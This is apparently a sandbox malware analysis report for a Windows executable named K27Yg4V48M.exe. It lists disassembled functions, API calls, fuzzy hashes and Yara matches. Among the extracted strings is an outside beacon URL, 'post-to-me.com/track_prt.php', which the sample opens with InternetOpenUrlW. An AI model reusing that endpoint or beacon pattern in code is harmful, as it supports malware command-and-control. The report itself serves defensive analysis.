                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                    • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                    • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0213A0C4
                                                                                                      • Part of subcall function 021336D1: HeapFree.KERNEL32(00000000,00000000,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?), ref: 021336E7
                                                                                                      • Part of subcall function 021336D1: GetLastError.KERNEL32(?,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?,?), ref: 021336F9
                                                                                                    • _free.LIBCMT ref: 0213A0D6
                                                                                                    • _free.LIBCMT ref: 0213A0E8
                                                                                                    • _free.LIBCMT ref: 0213A0FA
                                                                                                    • _free.LIBCMT ref: 0213A10C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                    • Instruction ID: 34c34cd959bff88e90ec6d6b9be89ab68a8c31b89e0f2cfbdfd00c4b3d80465b
                                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                    • Instruction Fuzzy Hash: 19F09672685300AF8766EB54E8C6C0A73DBAE043507640955F098D7B11CB71FCD08ADD
                                                                                                    APIs
                                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                                                    • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2583373041-0
                                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                    • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                    • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                    APIs
                                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0211CF36
                                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0211CF67
                                                                                                    • GetCurrentThread.KERNEL32 ref: 0211CF70
                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0211CF83
                                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0211CF8C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2583373041-0
                                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                    • Instruction ID: 3aa02edb17f12fb1c69d7de722a423bcf84c46e8ca60d900b4589394fdd39291
                                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                    • Instruction Fuzzy Hash: D7F08C322809019FC625EF60FA508AAB3B6AFC4610310466DE59A06554CF31E907DBA2
                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02102E8E
                                                                                                      • Part of subcall function 02101321: _wcslen.LIBCMT ref: 02101328
                                                                                                      • Part of subcall function 02101321: _wcslen.LIBCMT ref: 02101344
                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 021030A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InternetOpen_wcslen
                                                                                                    • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                    • API String ID: 3381584094-4083784958
                                                                                                    • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                    • Instruction ID: 3876862e5ccc7190c66c659cb94a5218c9741010890fb20678e4b78a4eb69b08
                                                                                                    • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                    • Instruction Fuzzy Hash: 485152A5E55344A8E320EFB0BC46B722378EF58712F10543AE528CB2F2E7A19944871E
                                                                                                    APIs
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0212896A
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 02128A23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: fB$csm
                                                                                                    • API String ID: 3480331319-1586063737
                                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                    • Instruction ID: fcdd208c169503a498aa06dbde9502986046a51d9adef472f50d3bd436941053
                                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                    • Instruction Fuzzy Hash: 6C410A30A40269DFCF10DF28C844A9E7BB5BF45328F158165F9156B391DB32E929CFA1
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\K27Yg4V48M.exe,00000104), ref: 0042F753
                                                                                                    • _free.LIBCMT ref: 0042F81E
                                                                                                    • _free.LIBCMT ref: 0042F828
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\K27Yg4V48M.exe
                                                                                                    • API String ID: 2506810119-2761900751
                                                                                                    • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                    • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                    • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                    • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\K27Yg4V48M.exe,00000104), ref: 0212F9BA
                                                                                                    • _free.LIBCMT ref: 0212FA85
                                                                                                    • _free.LIBCMT ref: 0212FA8F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\K27Yg4V48M.exe
                                                                                                    • API String ID: 2506810119-2761900751
                                                                                                    • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                    • Instruction ID: ac942250d98a78f69a79b529a5d5a76e719cbb44c3590073abf41293ad14c745
                                                                                                    • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                    • Instruction Fuzzy Hash: 3031AE71A80228EFDF21DF999C84D9EBBFDEF89310F104066F80897221D7709A59CB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                      • Part of subcall function 0043922A: _free.LIBCMT ref: 00439290
                                                                                                      • Part of subcall function 00438E9F: GetOEMCP.KERNEL32(00000000), ref: 00438ECA
                                                                                                    • _free.LIBCMT ref: 00439183
                                                                                                    • _free.LIBCMT ref: 004391B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast
                                                                                                    • String ID: (Sd$(Sd
                                                                                                    • API String ID: 3291180501-1171359670
                                                                                                    • Opcode ID: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
                                                                                                    • Instruction ID: 97d82b3a2133808e380870247b9945ea31129e8917de2cc4f3b867beb4678205
                                                                                                    • Opcode Fuzzy Hash: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
                                                                                                    • Instruction Fuzzy Hash: 63312731904205AFEF10EF99D444A5EB7F1EF48324F14119FE80467391DB799E40CB48
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                      • Part of subcall function 02139491: _free.LIBCMT ref: 021394F7
                                                                                                      • Part of subcall function 02139106: GetOEMCP.KERNEL32(00000000), ref: 02139131
                                                                                                    • _free.LIBCMT ref: 021393EA
                                                                                                    • _free.LIBCMT ref: 02139420
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast
                                                                                                    • String ID: (Sd$(Sd
                                                                                                    • API String ID: 3291180501-1171359670
                                                                                                    • Opcode ID: c947c04c6369be2b0b67581f9f5cbea0d3a159dd71843e43509783f1e1aa6e4f
                                                                                                    • Instruction ID: f76a7cb5bd3e064d6cd83178344b627bb3a58e221ec1b1a35afc194885372c48
                                                                                                    • Opcode Fuzzy Hash: c947c04c6369be2b0b67581f9f5cbea0d3a159dd71843e43509783f1e1aa6e4f
                                                                                                    • Instruction Fuzzy Hash: B2312972D44204AFDB12EF69D580BAEB7F7EF40320F15419AE8149B290EBB29D41CF40
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0040DDAB,?,004334EB,0040DDAB,00457AF8,0000000C), ref: 00433623
                                                                                                    • GetLastError.KERNEL32(?,004334EB,0040DDAB,00457AF8,0000000C), ref: 0043362D
                                                                                                    • __dosmaperr.LIBCMT ref: 00433658
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                    • String ID: Gd
                                                                                                    • API String ID: 2583163307-854319985
                                                                                                    • Opcode ID: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
                                                                                                    • Instruction ID: ffcc1f2f27edde42b46ba62bf7cfabe2240423d0af948ad6885287928014fc29
                                                                                                    • Opcode Fuzzy Hash: c02ba4ad0ae393da633c157a1d22a9d38b5276be70e67d92e6e7ccd80e321485
                                                                                                    • Instruction Fuzzy Hash: 17016F326042103AD6342B75684677F67458F8EB39F25212FF515873D2DA6DCE82414D
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,02133752,?,?,?,?,?,?,?,?,?,004412BD,000000FF), ref: 0213388A
                                                                                                    • GetLastError.KERNEL32(?,02133752,?,?,?,?,?,?,?,?,?,004412BD,000000FF), ref: 02133894
                                                                                                    • __dosmaperr.LIBCMT ref: 021338BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                    • String ID: Gd
                                                                                                    • API String ID: 2583163307-854319985
                                                                                                    • Opcode ID: ebdca8a1c7adbe074858f504d58375f2f4c191b84cfa181ab901558326dc3e0e
                                                                                                    • Instruction ID: bef663bcbfc88cc6b31d17a869075a96d81412f3c42fb5d277ce08ac18529883
                                                                                                    • Opcode Fuzzy Hash: ebdca8a1c7adbe074858f504d58375f2f4c191b84cfa181ab901558326dc3e0e
                                                                                                    • Instruction Fuzzy Hash: 1C0108326842601ED63B2238A845BAE6B5B4F82B35F2503FDE8398B1D1DB64D88141D9
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0210C8DE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw
                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 2005118841-1866435925
                                                                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                    • Instruction ID: d7fc068646950fc535fde83e2360bae4f83d06c51e28ffafb3453dd528ff69b4
                                                                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                    • Instruction Fuzzy Hash: 98F02B72C802086EDB08F554CC81BEE33989B06315F04817BED52AB0C2EBE89905CFEC
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                    • String ID: F(@
                                                                                                    • API String ID: 3213686812-2698495834
                                                                                                    • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                    • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                    • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                    • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                    • String ID: F(@
                                                                                                    • API String ID: 3213686812-2698495834
                                                                                                    • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                    • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                    • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                    • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pScheduler
                                                                                                    • API String ID: 1381464787-923244539
                                                                                                    • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                    • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                    • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                    • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                    APIs
                                                                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pContext
                                                                                                    • API String ID: 1990795212-2046700901
                                                                                                    • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                    • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                    • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                    • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                    • _free.LIBCMT ref: 0042E069
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFreeHandleLibrary_free
                                                                                                    • String ID: B
                                                                                                    • API String ID: 621396759-3071617958
                                                                                                    • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                    • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                    • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                    • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                    APIs
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pScheduler$version
                                                                                                    • API String ID: 1687795959-3154422776
                                                                                                    • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                    • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                    • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                    • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                    • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                    • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                    • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                    • Instruction ID: ef5a1945397241430042e3d9800db87c497d44cf28f0500811f9a6514e18c8d2
                                                                                                    • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                    • Instruction Fuzzy Hash: A9A17871980386AFEB27CF28C8907AEBFE7EF19754F58416DD4959B281C3358941CB50
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                    • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                    • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                    • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
                                                                                                    • Instruction ID: 311d42f7cbcb021795c705d442d687a057e7923d45ef1ae2c694356fb4f250d3
                                                                                                    • Opcode Fuzzy Hash: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
                                                                                                    • Instruction Fuzzy Hash: 47414C31EC0214AFDB276FB88C48BAE3BA7EF05730F240655F428D6590DB3644468FA1
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0213047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02136B51
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02136BDA
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02136BEC
